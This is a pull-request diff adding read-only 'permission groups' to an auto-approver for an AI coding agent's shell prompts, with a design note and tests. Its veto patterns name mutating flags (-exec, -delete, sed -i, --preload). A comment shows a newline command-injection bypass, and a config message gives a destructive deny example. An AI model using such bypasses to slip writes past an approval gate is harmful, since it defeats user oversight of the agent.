### PR TITLE
feat(auto-approve): permission groups + read fast-path (#495)

### DIFF
--- a/.context/epic-494-sync-permissions.md
+++ b/.context/epic-494-sync-permissions.md
@@ -1,0 +1,93 @@
+# Epic #494 — Synchronous permission decisions + permission groups
+
+## Problem (evidence)
+
+Real run, `remi --auto-approve` 0.6.2 (daemon pid 41966, session `82d6c6a6`, a
+`/review-pr` with parallel subagents). The failure cascade, repeated dozens of
+times in `~/.remi/remi.log`:
+
+```
+[AutoApprove 82d6c6a6] Bash: approve (7489ms)                       # 4B LLM, 6-8s, for a pure read
+[AutoApprove 82d6c6a6] Subagent Bash: skipping inject "1" (approved); no prompt visible on main PTY (agent=a4de5cc3 ...silent-failure-hunter)
+Question detected: Do you want to proceed?...                      # OutputProcessor leaks it to the app
+Answer ... : 1
+Ignoring stale answer: questionId 48ac7a2f... not in pending [...] # the tap lands on a superseded id
+```
+
+Window counts: 23 subagent approvals skipped, 20 stale-answer rejects, 58 real
+injects (main agent, worked fine).
+
+Four root causes -> the five user complaints:
+
+| Symptom | Cause |
+|---|---|
+| "all from a PR review" / "auto-approve read-by-definition w/o LLM" | No built-in read-only fast-path; only the user `allow` list (default `Read/Glob/Grep`, bare tool names) bypasses the LLM. Bash reads (`git show \| sed`) hit the 6-8s LLM. |
+| "responded 8 times, stuck, only the terminal resolved it" | Subagent approvals computed but inject **skipped** (`auto-approve-gate.ts:258`): remi answers only by typing into the PTY; for parallel subagents it can't tell whose prompt is on screen, so it skips all. |
+| "two questions which is not one, both expired" / "expire although not up" | Skipped prompt **leaks** via OutputProcessor; pending list grows to 6-8 ids; the displayed one is always behind the head -> stale-answer. |
+| "no context, just Do you want to proceed?" | PTY parser captures only the bare prompt; the hook's `tool_name`/`tool_input` is never merged in. |
+
+**Root architecture:** remi answers permissions by **PTY injection**
+(`hook-server.ts:191` always returns `'{}'`). That structurally cannot handle
+off-screen / parallel subagent prompts and races the eval against the PTY render.
+
+## Decision: synchronous hook-response decisions
+
+Verified against the live Claude Code docs (code.claude.com/docs/en/hooks):
+HTTP hooks are **synchronous decision points**. For `PermissionRequest`, a 2xx
+body `{ "hookSpecificOutput": { "hookEventName": "PermissionRequest",
+"decision": { "behavior": "allow" | "deny", "updatedInput"? } } }` is honored
+and Claude proceeds **without rendering the prompt**. (`PreToolUse` uses
+`permissionDecision: allow|deny|ask`.) Default hook timeout 600s, so a ~7s LLM
+eval can block the response fine.
+
+So: stop injecting "1"/"3"; return the decision in the hook response. Read-by-
+definition ops approve instantly via configurable groups; LLM verdicts block the
+response; only genuine escalations render a prompt (and carry tool/command
+context). This fixes latency + the subagent skip + the leak + stale-answers at
+the root.
+
+## Current flow (as-is)
+
+- `hook-server.ts handleRequest` -> `dispatch(body)` fire-and-forget -> always returns `'{}'`.
+- `AutoApproveGate.handlePermissionRequest` -> `AutoApproveService.evaluate()` (deny pattern 0ms -> allow pattern 0ms -> multichoice -> LLM) -> `inject('1'|'3'|pick)` via `pty.submitInput`, gated for subagents by `tracker.isPromptVisibleOnPTY()`.
+- `#484` buffer-until-verdict in `QuestionPresenceTracker` holds the PTY prompt while evaluating; releases on escalate. This whole buffer + the subagent PTY-presence gate exist **only because** answers go through the PTY.
+
+## Phases
+
+### Phase 1 (#495) — Permission groups + expanded command matching  [config layer, still injects]
+
+- Built-in named groups (curated pattern sets), new module `auto-approve/permission-groups.ts`:
+  - `read-only`: tools `Read`/`Glob`/`Grep`/`NotebookRead`; Bash read commands `cat head tail less sed -n rg grep egrep ls find wc file stat jq awk(read) cut sort uniq diff column tree`.
+  - `vcs-read`: `git show|log|diff|status|branch|blame|remote -v|ls-files|rev-parse|describe|tag -l|stash list`; `gh pr view|diff|list|checks|status`, `gh issue view|list`, `gh run view|list`, `gh api` (GET, no `-X`/`-f`/`-F`/`--field`).
+  - `build-test`: `bun test`, `bun run typecheck`, `tsc --noEmit`, `biome check`, `bunx biome check`, `eslint`(no `--fix`), `bun run lint`, `pytest`(read), `uv run pytest`.
+- `config.toml` `[auto_approve]`: `approve_groups` / `deny_groups` (arrays of group names), alongside existing `allow`/`deny`. Order: deny_groups + deny patterns FIRST (any match -> deny), then allow_groups + allow patterns (any match -> approve), then LLM. Unknown group name -> validation warning, ignored.
+- Matcher: command-segment-aware **prefix** matching for group command patterns. Split the Bash command on `&&`, `||`, `;`, `|` (respecting quotes minimally) into segments; a group pattern matches if any segment, after trimming leading `env`/`sudo`?-No (sudo never in read groups), starts with the pattern token sequence (word-boundary). So `git show` matches `cd x && git show ...` but NOT `git showoff`, and a read pattern never matches a write because writes aren't in the read set AND a deny group can pre-empt. Keep user `allow`/`deny` as substring (back-comaptible).
+  - **Safety invariant (tested adversarially):** no read/vcs/build pattern may match a mutating command. E.g. `git diff` must not match `git diff > x` (redirection) — segment scan treats `>` as outside; be conservative: if a segment contains shell redirection/`$(`/backticks to an unknown sink, do NOT group-approve (fall through to LLM). Document the conservative bias.
+- Still answers via PTY injection (no architecture change). Removes the 6-8s latency for read-by-definition ops. Leak fix is Phase 2.
+
+### Phase 2 (#496) — Synchronous hook-response decisions  [the architecture change]
+
+- `hook-server`: add a `resolvePermission(input): Promise<PermissionResolution>` seam. For `PermissionRequest`, `handleRequest` awaits it and serialises the 2xx body. `allow`/`deny` -> behavior; `escalate` -> body that lets Claude render the prompt (`{}` or `behavior:"ask"` — confirm which CC honors), then surface the question as today.
+- `AutoApproveGate.handlePermissionRequest` returns the decision instead of injecting. Read-only groups resolve ~0ms; LLM verdicts block (remi eval timeout, << 600s).
+- Concurrency: parallel read-only subagent perms fast-path (no `evaluating` contention -> they short-circuit before it). Parallel LLM perms still serialise (2nd escalates) — acceptable; queue is a later optimisation, `log()` it.
+- Retire PTY injection for auto-approve verdicts. The subagent PTY-presence skip gate and the `#484` buffer become dead for auto-approve (remove in Phase 3, or guard here).
+- **Real-Claude e2e** (extend `tests/e2e/transcript-binding/`): subagent-heavy session; assert read-by-definition perms auto-allow with NO prompt rendered, no question flood, no stale-answer.
+
+### Phase 3 (#497) — Escalation context + cleanup
+
+- Merge `tool_name` + `tool_input` (command) + agent label into the escalated question text/subtitle. Truncate long inputs.
+- Remove dead PTY-injection answer path + subagent skip gate + `#484` buffer.
+- Update `AGENTS.md` / docs for the synchronous model + groups.
+
+## Out of scope / sequencing
+
+Epic #481 phases 5 (terminal escalation cue + mobile badge) and 6
+(answered-anywhere-clears-everywhere + APNS token pruning) are **postponed**
+until this epic lands, then resumed.
+
+## Test discipline
+
+No mocks. Real domain objects + spy sinks (matches the existing
+`auto-approve-gate.test.ts` style). Each phase independently green:
+`bun run typecheck` + `bunx biome check` + `bun test` (excl. the Ollama-gated
+auto-approve LLM suite when Ollama is down). Real-Claude e2e at Phase 2.

--- a/packages/daemon/src/auto-approve/auto-approve-service.ts
+++ b/packages/daemon/src/auto-approve/auto-approve-service.ts
@@ -18,6 +18,7 @@ import {
   parseMultiChoiceDecision,
 } from './multichoice.ts';
 import { matchPattern } from './pattern-matcher.ts';
+import { matchGroups } from './permission-groups.ts';
 import { buildPrompt } from './prompt-builder.ts';
 import type { AutoApproveConfig, AutoApproveResult, MultiChoiceMode } from './types.ts';
 
@@ -83,6 +84,8 @@ export class AutoApproveService {
   private readonly logDecisions: boolean;
   private readonly allow: readonly string[];
   private readonly deny: readonly string[];
+  private readonly approveGroups: readonly string[];
+  private readonly denyGroups: readonly string[];
   private readonly instructions: string;
   private readonly multichoiceMode: MultiChoiceMode;
   /** Falls back to llmConfig.model when empty. */
@@ -113,6 +116,8 @@ export class AutoApproveService {
     this.logDecisions = config.log_decisions;
     this.allow = config.allow;
     this.deny = config.deny;
+    this.approveGroups = config.approve_groups;
+    this.denyGroups = config.deny_groups;
     this.instructions = config.instructions;
     this.multichoiceMode = config.multichoice;
     this.multichoiceModel = config.multichoice_model;
@@ -150,18 +155,32 @@ export class AutoApproveService {
     // Entire body wrapped in try/catch so the "never throws" contract holds
     // even if matchPattern or other sync code fails (e.g. malformed config).
     try {
-      // Deny list: checked first, always wins. No LLM call.
+      // Deny list + deny groups: checked first, always win. No LLM call.
       const denyMatch = matchPattern(toolName, toolInput, this.deny);
       if (denyMatch !== null) {
         const reasoning = `deny-matched pattern: "${denyMatch}"`;
         this.logFn(`${prefix} DENIED ${toolName}: ${reasoning} (0ms)`);
         return { decision: 'deny', reasoning, durationMs: 0, model };
       }
+      const denyGroupMatch = matchGroups(toolName, toolInput, this.denyGroups);
+      if (denyGroupMatch !== null) {
+        const reasoning = `deny-matched group: "${denyGroupMatch}"`;
+        this.logFn(`${prefix} DENIED ${toolName}: ${reasoning} (0ms)`);
+        return { decision: 'deny', reasoning, durationMs: 0, model };
+      }
 
-      // Allow list: bypasses LLM for known-safe operations.
+      // Allow list + approve groups: bypass the LLM for known-safe operations.
       const allowMatch = matchPattern(toolName, toolInput, this.allow);
       if (allowMatch !== null) {
         const reasoning = `allow-matched pattern: "${allowMatch}"`;
+        if (this.logDecisions) {
+          this.logFn(`${prefix} ${toolName}: approve (0ms) - ${reasoning}`);
+        }
+        return { decision: 'approve', reasoning, durationMs: 0, model };
+      }
+      const approveGroupMatch = matchGroups(toolName, toolInput, this.approveGroups);
+      if (approveGroupMatch !== null) {
+        const reasoning = `approve-matched group: "${approveGroupMatch}"`;
         if (this.logDecisions) {
           this.logFn(`${prefix} ${toolName}: approve (0ms) - ${reasoning}`);
         }

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -1,0 +1,320 @@
+/**
+ * Built-in permission groups for auto-approve (epic #494).
+ *
+ * A group is a named, curated set of read-by-definition operations that can be
+ * approved WITHOUT calling the LLM. Users opt in/out by group via
+ * `[auto_approve] approve_groups` / `deny_groups` in config.toml.
+ *
+ * Safety model:
+ *  - Bash commands are matched per compound-segment (split on && || ; |).
+ *  - Each non-neutral segment must word-boundary-prefix-match a curated read
+ *    prefix from the requested groups; otherwise the WHOLE command falls
+ *    through to the LLM. Conservative by design: a false negative (a read the
+ *    LLM still evaluates) is fine; a false positive (group-approving a write)
+ *    is not.
+ *  - A veto rejects any segment carrying shell control (command substitution,
+ *    output redirection to a real file, backgrounding) or an unambiguous
+ *    mutation flag (`-X`, `--field`, `--write`, `--fix`, `-delete`, ...). None
+ *    of those tokens legitimately appears in a curated read command, so the
+ *    veto can only catch a write that slipped past a read prefix.
+ *  - Commands whose read form can be flipped to a write by an AMBIGUOUS short
+ *    flag (`sort -o`, `find -delete`, `awk` system(), `gh api -X`) are
+ *    intentionally EXCLUDED from the curated set. Users can add them via the
+ *    substring `allow` list at their own discretion.
+ *  - Non-Bash tools match by bare tool name.
+ */
+
+export interface PermissionGroup {
+  /** Bare tool names this group approves (e.g. "Read", "Glob"). */
+  readonly tools: readonly string[];
+  /** Curated read-only Bash command prefixes (word-boundary prefix match). */
+  readonly commands: readonly string[];
+}
+
+export const BUILTIN_GROUPS: Readonly<Record<string, PermissionGroup>> = {
+  'read-only': {
+    tools: ['Read', 'Glob', 'Grep', 'NotebookRead'],
+    commands: [
+      'cat',
+      'head',
+      'tail',
+      'less',
+      'sed -n',
+      'grep',
+      'egrep',
+      'rg',
+      'wc',
+      'file',
+      'stat',
+      'column',
+      'cut',
+      'uniq',
+      'jq',
+      'ls',
+    ],
+  },
+  'vcs-read': {
+    tools: [],
+    commands: [
+      'git show',
+      'git log',
+      'git diff',
+      'git status',
+      'git blame',
+      'git ls-files',
+      'git ls-tree',
+      'git rev-parse',
+      'git describe',
+      'git cat-file',
+      'git show-ref',
+      'git for-each-ref',
+      'git shortlog',
+      // `git reflog` alone exposes `git reflog expire|delete` (history loss);
+      // pin to the read-only subcommands.
+      'git reflog show',
+      'git reflog exists',
+      'git whatchanged',
+      'git grep',
+      'git stash list',
+      'git config --get',
+      'git config --list',
+      'git config -l',
+      // `git branch`/`git tag`/`git remote` are intentionally omitted: their
+      // list flags (`-a`/`-l`/`-v`) sit one positional or `-d`/`-D`/`-m` away
+      // from a delete/rename/add, and git overloads those short flags (e.g.
+      // `-d` is delete for branch but `--directories` for `git grep`), so a
+      // flag veto is unreliable. Use `git rev-parse --abbrev-ref HEAD` for the
+      // current branch; users can add others to the `allow` list explicitly.
+      'gh pr view',
+      'gh pr diff',
+      'gh pr list',
+      'gh pr checks',
+      'gh pr status',
+      'gh issue view',
+      'gh issue list',
+      'gh issue status',
+      'gh run view',
+      'gh run list',
+      'gh repo view',
+      'gh release view',
+      'gh release list',
+      'gh search',
+      'gh status',
+    ],
+  },
+  'build-test': {
+    tools: [],
+    commands: [
+      'bun test',
+      'bun run test',
+      'bun run typecheck',
+      'bun run check',
+      'bun run lint',
+      'tsc --noEmit',
+      'biome check',
+      'bunx biome check',
+      'pytest',
+      'uv run pytest',
+      'vitest run',
+      // `eslint` is omitted: `--rulesdir`/`--resolve-plugins-relative-to` load
+      // and execute arbitrary JS. NOTE: enabling build-test means you trust
+      // running your project's own test/build commands, which execute project
+      // code by design (and may write coverage/report artifacts).
+    ],
+  },
+};
+
+/** Benign segments that may appear in a compound command without needing a group. */
+const NEUTRAL_PREFIXES: readonly string[] = ['cd', 'pwd', 'true', 'echo', ':'];
+
+/**
+ * Unambiguous mutation indicators. None legitimately appears in a curated read
+ * command, so matching one can only mean a write snuck past a read prefix
+ * (e.g. `git diff --output=f`, `biome check --write`, `find . -delete`).
+ */
+const MUTATION_TOKEN =
+  /(^|\s)(-X|--method|--field|--raw-field|--input|--output|--write|--apply|--fix|-delete|-exec|-execdir|-ok)(\s|=|$)/;
+
+/** True if a name is a built-in group. */
+export function isKnownGroup(name: string): boolean {
+  return Object.hasOwn(BUILTIN_GROUPS, name);
+}
+
+/** All built-in group names (for validation / docs). */
+export function knownGroupNames(): string[] {
+  return Object.keys(BUILTIN_GROUPS);
+}
+
+/**
+ * Split a command into compound segments on `&&`, `||`, `;`, `|`, and newlines
+ * (`\n`/`\r` — the shell treats an unquoted newline as a command separator,
+ * exactly like `;`), respecting single/double quotes (best-effort).
+ * Backgrounding `&` is left in the segment for the shell-control veto to catch.
+ */
+function splitCompound(command: string): string[] {
+  const segments: string[] = [];
+  let current = '';
+  let quote: '"' | "'" | null = null;
+  for (let i = 0; i < command.length; i++) {
+    const c = command[i];
+    const next = command[i + 1];
+    if (quote !== null) {
+      current += c;
+      if (c === quote) quote = null;
+      continue;
+    }
+    if (c === '"' || c === "'") {
+      quote = c;
+      current += c;
+      continue;
+    }
+    // Unquoted newline / carriage return == a command separator. Without this,
+    // `git log \ngit push` is one segment that prefix-matches `git log` and the
+    // injected `git push` is never examined (shell-injection bypass).
+    if (c === ';' || c === '\n' || c === '\r') {
+      segments.push(current);
+      current = '';
+      continue;
+    }
+    if (c === '&' && next === '&') {
+      segments.push(current);
+      current = '';
+      i++;
+      continue;
+    }
+    if (c === '|' && next === '|') {
+      segments.push(current);
+      current = '';
+      i++;
+      continue;
+    }
+    if (c === '|') {
+      segments.push(current);
+      current = '';
+      continue;
+    }
+    current += c;
+  }
+  segments.push(current);
+  return segments;
+}
+
+/** True if the segment carries shell control that could escape the read prefix. */
+function hasShellControl(segment: string): boolean {
+  // Command / process substitution.
+  if (segment.includes('$(') || segment.includes('`') || segment.includes('<(')) {
+    return true;
+  }
+  // Backgrounding / control operator: a lone `&` anywhere that is not part of
+  // `&&` (already split out), an fd-dup (`2>&1`, `>&2`), nor an `&>` redirect
+  // (caught as redirection below). Catches `cmd &`, `cmd & other`, `a&b`.
+  if (/(^|[^&>])&(?![&>0-9])/.test(segment)) {
+    return true;
+  }
+  // Output redirection to anything other than /dev/null or an fd dup (2>&1).
+  const redirs = segment.match(/\d*>>?\s*&?\S+/g);
+  if (redirs) {
+    for (const r of redirs) {
+      const target = r.replace(/^\d*>>?\s*/, '');
+      if (target !== '/dev/null' && !/^&\d+$/.test(target)) {
+        return true;
+      }
+    }
+  }
+  return false;
+}
+
+/**
+ * Family-scoped flag vetoes: a flag that flips a curated read prefix into a
+ * write or code-execution, but whose flag letter is overloaded (it reads for
+ * other commands), so it cannot live in the global MUTATION_TOKEN.
+ */
+const SCOPED_VETOES: ReadonlyArray<{ family: RegExp; flag: RegExp }> = [
+  // `sed -n` is read; `sed -n -i`/`--in-place` rewrites the file. The suffix
+  // can attach directly (`-i.bak`), so match any `-i` token (no read sed flag
+  // starts with `-i`). `-i` is case-insensitive for grep, so it cannot be a
+  // global mutation token — this veto is scoped to sed.
+  { family: /^sed\b/, flag: /(^|\s)(-i|--in-place)/ },
+  // `bun test --preload <file>` executes an arbitrary file before the suite.
+  { family: /^bunx?\b/, flag: /(^|\s)--preload(\s|=|$)/ },
+];
+
+/** True if a family-scoped veto flag applies to this segment. */
+function hasScopedVeto(segment: string): boolean {
+  for (const { family, flag } of SCOPED_VETOES) {
+    if (family.test(segment) && flag.test(segment)) return true;
+  }
+  return false;
+}
+
+/** Word-boundary prefix match: `seg === p` or `seg` starts with `p + ' '`. */
+function matchPrefix(segment: string, prefixes: readonly string[]): string | null {
+  let best: string | null = null;
+  for (const p of prefixes) {
+    if (segment === p || segment.startsWith(`${p} `)) {
+      // Prefer the longest (most specific) match for clearer logging.
+      if (best === null || p.length > best.length) best = p;
+    }
+  }
+  return best;
+}
+
+/**
+ * Decide whether a Bash command is fully covered by the given read prefixes.
+ * Returns the (most specific) matched prefix, or null to fall through to the LLM.
+ *
+ * A command is approved only when EVERY compound segment is either neutral
+ * (cd/pwd/echo/...) or matches a read prefix, none carries shell control or a
+ * mutation flag, and at least one segment actually matched a read prefix (a
+ * command of only neutral segments is not "a read").
+ */
+export function matchReadOnlyCommand(command: string, prefixes: readonly string[]): string | null {
+  const segments = splitCompound(command);
+  let matched: string | null = null;
+  for (const raw of segments) {
+    const seg = raw.trim();
+    if (seg === '') continue;
+    if (hasShellControl(seg) || MUTATION_TOKEN.test(seg) || hasScopedVeto(seg)) return null;
+    if (matchPrefix(seg, NEUTRAL_PREFIXES) !== null) continue;
+    const hit = matchPrefix(seg, prefixes);
+    if (hit === null) return null;
+    if (matched === null) matched = hit;
+  }
+  return matched;
+}
+
+/**
+ * Match a permission request against the named groups. Returns a descriptive
+ * `"group:pattern"` string when matched, or null. Unknown group names are
+ * ignored (validated separately at config load).
+ */
+export function matchGroups(
+  toolName: string,
+  toolInput: Record<string, unknown>,
+  groupNames: readonly string[],
+): string | null {
+  const known = groupNames.filter(isKnownGroup);
+  if (known.length === 0) return null;
+
+  if (toolName === 'Bash') {
+    const command = typeof toolInput['command'] === 'string' ? toolInput['command'].trim() : '';
+    if (command === '') return null;
+    // Map each prefix back to its owning group for the descriptive return.
+    const prefixToGroup = new Map<string, string>();
+    for (const name of known) {
+      for (const cmd of BUILTIN_GROUPS[name]?.commands ?? []) {
+        if (!prefixToGroup.has(cmd)) prefixToGroup.set(cmd, name);
+      }
+    }
+    const hit = matchReadOnlyCommand(command, [...prefixToGroup.keys()]);
+    if (hit === null) return null;
+    return `${prefixToGroup.get(hit) ?? 'group'}:${hit}`;
+  }
+
+  for (const name of known) {
+    if (BUILTIN_GROUPS[name]?.tools.includes(toolName)) {
+      return `${name}:${toolName}`;
+    }
+  }
+  return null;
+}

--- a/packages/daemon/src/auto-approve/types.ts
+++ b/packages/daemon/src/auto-approve/types.ts
@@ -88,6 +88,20 @@ export interface AutoApproveConfig {
    */
   readonly deny: readonly string[];
   /**
+   * Built-in permission groups to approve without calling the LLM (epic #494).
+   * A group is a curated set of read-by-definition operations matched with
+   * compound-segment-aware prefix logic (see `permission-groups.ts`), safer
+   * than the substring `allow` list for Bash. Known groups: "read-only",
+   * "vcs-read", "build-test". Default: all three.
+   */
+  readonly approve_groups: readonly string[];
+  /**
+   * Built-in permission groups to deny without calling the LLM. Checked before
+   * `approve_groups` (and before `allow`); any group/pattern deny wins.
+   * Default: empty.
+   */
+  readonly deny_groups: readonly string[];
+  /**
    * Natural-language guidance appended to the LLM system prompt.
    * Lets users steer the LLM for ambiguous cases not covered by allow/deny.
    * Empty string means no extra guidance (use default prompt only).

--- a/packages/daemon/src/config/config.ts
+++ b/packages/daemon/src/config/config.ts
@@ -10,6 +10,7 @@ import * as os from 'node:os';
 import * as path from 'node:path';
 import { DAEMON_BASE_PORT, DAEMON_PORT_RANGE, errorToString } from '@remi/shared';
 import { parse as parseToml } from 'smol-toml';
+import { isKnownGroup, knownGroupNames } from '../auto-approve/permission-groups.ts';
 import type { AutoApproveConfig } from '../auto-approve/types.ts';
 
 const REMI_DIR = path.join(os.homedir(), '.remi');
@@ -142,6 +143,12 @@ export const DEFAULT_CONFIG: RemiConfig = {
     // is compound-command-unsafe); the LLM prompt evaluates those in full.
     allow: ['Read', 'Glob', 'Grep'],
     deny: [],
+    // Built-in read-by-definition groups, fast-pathed without an LLM call
+    // using compound-segment-aware matching (epic #494). All three on by
+    // default so enabling auto-approve immediately stops paying LLM latency
+    // for reads / VCS queries / read-only build+test runs.
+    approve_groups: ['read-only', 'vcs-read', 'build-test'],
+    deny_groups: [],
     instructions: '',
     multichoice: 'skip',
     multichoice_model: '',
@@ -290,6 +297,23 @@ function validateAutoApprove(cfg: AutoApproveConfig, configPath: string): void {
     throw new Error(
       `Invalid auto_approve.deny in ${configPath}: must be an array of strings. Example: deny = ["rm -rf /", "sudo "]`,
     );
+  }
+  if (!isStringArray(cfg.approve_groups)) {
+    throw new Error(
+      `Invalid auto_approve.approve_groups in ${configPath}: must be an array of group names. Known groups: ${knownGroupNames().join(', ')}. Example: approve_groups = ["read-only", "vcs-read"]`,
+    );
+  }
+  if (!isStringArray(cfg.deny_groups)) {
+    throw new Error(
+      `Invalid auto_approve.deny_groups in ${configPath}: must be an array of group names. Known groups: ${knownGroupNames().join(', ')}.`,
+    );
+  }
+  for (const g of [...cfg.approve_groups, ...cfg.deny_groups]) {
+    if (!isKnownGroup(g)) {
+      console.warn(
+        `[AutoApprove] Warning: unknown permission group "${g}" in ${configPath}; ignored. Known groups: ${knownGroupNames().join(', ')}.`,
+      );
+    }
   }
   if (typeof cfg.instructions !== 'string') {
     throw new Error(

--- a/packages/daemon/src/config/config.ts
+++ b/packages/daemon/src/config/config.ts
@@ -640,6 +640,12 @@ export function formatConfig(config: RemiConfig, configPath: string = CONFIG_PAT
   lines.push(`  log_decisions = ${config.auto_approve.log_decisions}`);
   lines.push(`  allow = [${config.auto_approve.allow.map((s) => `"${s}"`).join(', ')}]`);
   lines.push(`  deny = [${config.auto_approve.deny.map((s) => `"${s}"`).join(', ')}]`);
+  lines.push(
+    `  approve_groups = [${config.auto_approve.approve_groups.map((s) => `"${s}"`).join(', ')}]`,
+  );
+  lines.push(
+    `  deny_groups = [${config.auto_approve.deny_groups.map((s) => `"${s}"`).join(', ')}]`,
+  );
   const instr = config.auto_approve.instructions;
   const instrDisplay = instr ? `"${instr.slice(0, 40)}${instr.length > 40 ? '...' : ''}"` : '""';
   lines.push(`  instructions = ${instrDisplay}`);

--- a/packages/daemon/tests/auto-approve/auto-approve-service.test.ts
+++ b/packages/daemon/tests/auto-approve/auto-approve-service.test.ts
@@ -44,6 +44,8 @@ function makeConfig(overrides?: Partial<AutoApproveConfig>): AutoApproveConfig {
     log_decisions: false,
     allow: [],
     deny: [],
+    approve_groups: [],
+    deny_groups: [],
     instructions: '',
     multichoice: 'skip',
     multichoice_model: '',
@@ -518,6 +520,71 @@ describe('AutoApproveService - allow/deny lists', () => {
     // Should escalate via LLM fall-through (unreachable), NOT via patterns
     expect(result.decision).toBe('escalate');
     expect(result.reasoning).not.toContain('allow-matched');
+  });
+});
+
+describe('AutoApproveService - permission groups (#494)', () => {
+  // Unreachable base_url: if any of these hit the LLM, the test is slow and the
+  // group fast-path is broken.
+  function groupService(over: Partial<AutoApproveConfig>): AutoApproveService {
+    return new AutoApproveService(
+      makeConfig({ base_url: 'http://10.255.255.1', timeout: 30, ...over }),
+      logFn,
+    );
+  }
+
+  test('approve_groups fast-paths a read-by-definition Bash command without the LLM', async () => {
+    // The pipe spans two groups: `git show` (vcs-read) and `sed -n` (read-only).
+    // Every segment must be covered, so both groups are required.
+    const service = groupService({ approve_groups: ['read-only', 'vcs-read'] });
+    const start = Date.now();
+    const result = await service.evaluate('Bash', {
+      command: "git show abc:file | sed -n '1,40p'",
+    });
+    expect(result.decision).toBe('approve');
+    expect(result.reasoning).toContain('approve-matched group');
+    expect(result.reasoning).toContain('vcs-read:git show');
+    expect(result.durationMs).toBe(0);
+    expect(Date.now() - start).toBeLessThan(1000);
+  });
+
+  test('approve_groups fast-paths a read tool', async () => {
+    const service = groupService({ approve_groups: ['read-only'] });
+    const result = await service.evaluate('Grep', { pattern: 'foo' });
+    expect(result.decision).toBe('approve');
+    expect(result.reasoning).toContain('read-only:Grep');
+  });
+
+  test('deny_groups wins over approve_groups', async () => {
+    const service = groupService({
+      approve_groups: ['build-test'],
+      deny_groups: ['build-test'],
+    });
+    const result = await service.evaluate('Bash', { command: 'bun test' });
+    expect(result.decision).toBe('deny');
+    expect(result.reasoning).toContain('deny-matched group');
+  });
+
+  test('a mutating command not covered by any group falls through to the LLM', async () => {
+    const service = groupService({
+      approve_groups: ['read-only', 'vcs-read', 'build-test'],
+      base_url: 'http://localhost:1',
+      timeout: 1,
+    });
+    const result = await service.evaluate('Bash', { command: 'git push origin main' });
+    expect(result.decision).toBe('escalate');
+    expect(result.reasoning).not.toContain('approve-matched group');
+  });
+
+  test('empty approve_groups does nothing', async () => {
+    const service = groupService({
+      approve_groups: [],
+      base_url: 'http://localhost:1',
+      timeout: 1,
+    });
+    const result = await service.evaluate('Bash', { command: 'git status' });
+    expect(result.decision).toBe('escalate');
+    expect(result.reasoning).not.toContain('approve-matched group');
   });
 });
 

--- a/packages/daemon/tests/auto-approve/cancel.test.ts
+++ b/packages/daemon/tests/auto-approve/cancel.test.ts
@@ -109,6 +109,8 @@ function makeConfig(timeoutSeconds: number, baseUrl?: string): AutoApproveConfig
     log_decisions: false,
     allow: [],
     deny: [],
+    approve_groups: [],
+    deny_groups: [],
     instructions: '',
     multichoice: 'skip',
     multichoice_model: '',

--- a/packages/daemon/tests/auto-approve/llm-judgment.test.ts
+++ b/packages/daemon/tests/auto-approve/llm-judgment.test.ts
@@ -59,6 +59,8 @@ function makeConfig(overrides?: Partial<AutoApproveConfig>): AutoApproveConfig {
     log_decisions: true,
     allow: [],
     deny: [],
+    approve_groups: [],
+    deny_groups: [],
     instructions: '',
     multichoice: 'skip',
     multichoice_model: '',

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -1,0 +1,225 @@
+import { describe, expect, test } from 'bun:test';
+import {
+  BUILTIN_GROUPS,
+  isKnownGroup,
+  knownGroupNames,
+  matchGroups,
+  matchReadOnlyCommand,
+} from '../../src/auto-approve/permission-groups.ts';
+
+const ALL = ['read-only', 'vcs-read', 'build-test'];
+
+/** Convenience: match a Bash command against the named groups. */
+function bash(command: string, groups: readonly string[] = ALL): string | null {
+  return matchGroups('Bash', { command }, groups);
+}
+
+describe('permission-groups: known groups', () => {
+  test('isKnownGroup', () => {
+    expect(isKnownGroup('read-only')).toBe(true);
+    expect(isKnownGroup('vcs-read')).toBe(true);
+    expect(isKnownGroup('build-test')).toBe(true);
+    expect(isKnownGroup('bogus')).toBe(false);
+    expect(isKnownGroup('')).toBe(false);
+  });
+
+  test('knownGroupNames lists exactly the three built-ins', () => {
+    expect(knownGroupNames().sort()).toEqual([...ALL].sort());
+  });
+});
+
+describe('permission-groups: tool matches', () => {
+  test('Read/Glob/Grep/NotebookRead map to read-only', () => {
+    for (const tool of ['Read', 'Glob', 'Grep', 'NotebookRead']) {
+      expect(matchGroups(tool, {}, ['read-only'])).toBe(`read-only:${tool}`);
+    }
+  });
+
+  test('Write/Edit/Bash never match a tool group', () => {
+    expect(matchGroups('Write', {}, ALL)).toBeNull();
+    expect(matchGroups('Edit', {}, ALL)).toBeNull();
+    // Bash with no command is not a tool-name match.
+    expect(matchGroups('Bash', {}, ALL)).toBeNull();
+  });
+
+  test('tool match requires the owning group to be requested', () => {
+    expect(matchGroups('Read', {}, ['vcs-read', 'build-test'])).toBeNull();
+    expect(matchGroups('Read', {}, ['read-only'])).toBe('read-only:Read');
+  });
+});
+
+describe('permission-groups: read-only Bash (positive)', () => {
+  const cases: Array<[string, string]> = [
+    ['cat file.txt', 'read-only:cat'],
+    ['head -50 a.ts', 'read-only:head'],
+    ['tail -f log.txt', 'read-only:tail'],
+    ["sed -n '1,40p' file", 'read-only:sed -n'],
+    ['grep -rn foo src', 'read-only:grep'],
+    ['rg pattern packages', 'read-only:rg'],
+    ['wc -l file', 'read-only:wc'],
+    ['ls -la', 'read-only:ls'],
+    ['jq .version package.json', 'read-only:jq'],
+  ];
+  for (const [cmd, expected] of cases) {
+    test(cmd, () => expect(bash(cmd)).toBe(expected));
+  }
+});
+
+describe('permission-groups: vcs-read Bash (positive)', () => {
+  const cases: Array<[string, string]> = [
+    ['git show abc123:path/to/file', 'vcs-read:git show'],
+    ['git log --oneline -5', 'vcs-read:git log'],
+    ['git diff HEAD~1', 'vcs-read:git diff'],
+    ['git status', 'vcs-read:git status'],
+    ['git blame file', 'vcs-read:git blame'],
+    ['git rev-parse --short HEAD', 'vcs-read:git rev-parse'],
+    ['git rev-parse --abbrev-ref HEAD', 'vcs-read:git rev-parse'],
+    ['git reflog show --oneline', 'vcs-read:git reflog show'],
+    ['git config --get user.email', 'vcs-read:git config --get'],
+    ['gh pr diff 494', 'vcs-read:gh pr diff'],
+    ['gh pr view 494 --json title', 'vcs-read:gh pr view'],
+    ['gh run list --limit 5', 'vcs-read:gh run list'],
+  ];
+  for (const [cmd, expected] of cases) {
+    test(cmd, () => expect(bash(cmd)).toBe(expected));
+  }
